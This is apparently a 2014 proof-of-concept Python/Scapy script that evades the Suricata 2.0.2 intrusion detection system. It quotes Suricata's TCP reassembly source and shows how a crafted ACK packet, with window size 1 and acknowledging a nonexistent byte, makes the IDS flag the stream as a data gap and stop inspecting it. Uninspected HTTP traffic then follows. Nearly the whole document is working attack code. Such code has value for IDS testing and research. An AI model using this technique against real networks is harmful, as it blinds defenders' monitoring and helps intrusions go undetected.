|
#!/usr/bin/python
|
|
#16-07-2014
|
|
#@JmpCallPoo
|
|
|
|
from scapy.all import *
|
|
|
|
#Possible evasion :
|
|
#
|
|
#stream-tcp-reassemble.c@2911 (Suricata 2.0.2)
|
|
#
|
|
#/* Check if we have a gap at the start of the list. If last_ack is
|
|
#* bigger than the list start and the list start is bigger than
|
|
#* next_seq, we know we are missing data that has been ack'd. That
|
|
#* won't get retransmitted, so it's a data gap.
|
|
#*/
|
|
#if (SEQ_GT(seg->seq, next_seq) && SEQ_LT(seg->seq, stream->last_ack)) {
|
|
# ...
|
|
# stream->flags |= STREAMTCP_STREAM_FLAG_GAP; //Never process this stream again...
|
|
# ...
|
|
#}
|
|
|
|
dst_ip = '1.2.3.4'
|
|
|
|
syn = IP(dst=dst_ip) / TCP(dport=80, seq=123456, flags='S')
|
|
syn_ack = sr1(syn, retry=0, timeout=1)
|
|
|
|
ack = IP(dst=dst_ip) / TCP(dport=80, sport=syn_ack[TCP].dport, seq=syn_ack[TCP].ack, ack=syn_ack[TCP].seq+1, flags='A', window=4096)
|
|
sr1(ack, retry=0, timeout=1)
|
|
|
|
#This is the evil packet, this packet flags the TCP stream as STREAMTCP_STREAM_FLAG_GAP (Data Gap) in suricata, but don't impact normal TCP stack
|
|
#Set window size to 1, and ACK a non existant packet.
|
|
#Working at least on Linux 3.2 and Windows XP
|
|
fake_ack = IP(dst=dst_ip) / TCP(dport=80, sport=syn_ack[TCP].dport, seq=syn_ack[TCP].ack, ack=syn_ack[TCP].seq+3, flags='A', window=1)
|
|
sr1(fake_ack, retry=0, timeout=1)
|
|
|
|
getStr = 'GET /\r\nHost: '+dst_ip+'\r\n\r\n';
|
|
request = IP(dst=dst_ip) / TCP(dport=80, sport=syn_ack[TCP].dport, seq=syn_ack[TCP].ack, ack=syn_ack[TCP].seq+1, flags='A', window=4069) / getStr
|
|
reply = sr1(request, retry=0, timeout=2)
|
|
|
|
#Will not work for you, set the corret seq incrementation, but this packet isn't important !
|
|
fin = IP(dst=dst_ip) / TCP(dport=80, sport=syn_ack[TCP].dport, seq=syn_ack[TCP].ack+29, ack=syn_ack[TCP].seq+329, flags='FA', window=4096)
|
|
sr1(fin, retry=0, timeout=1)
|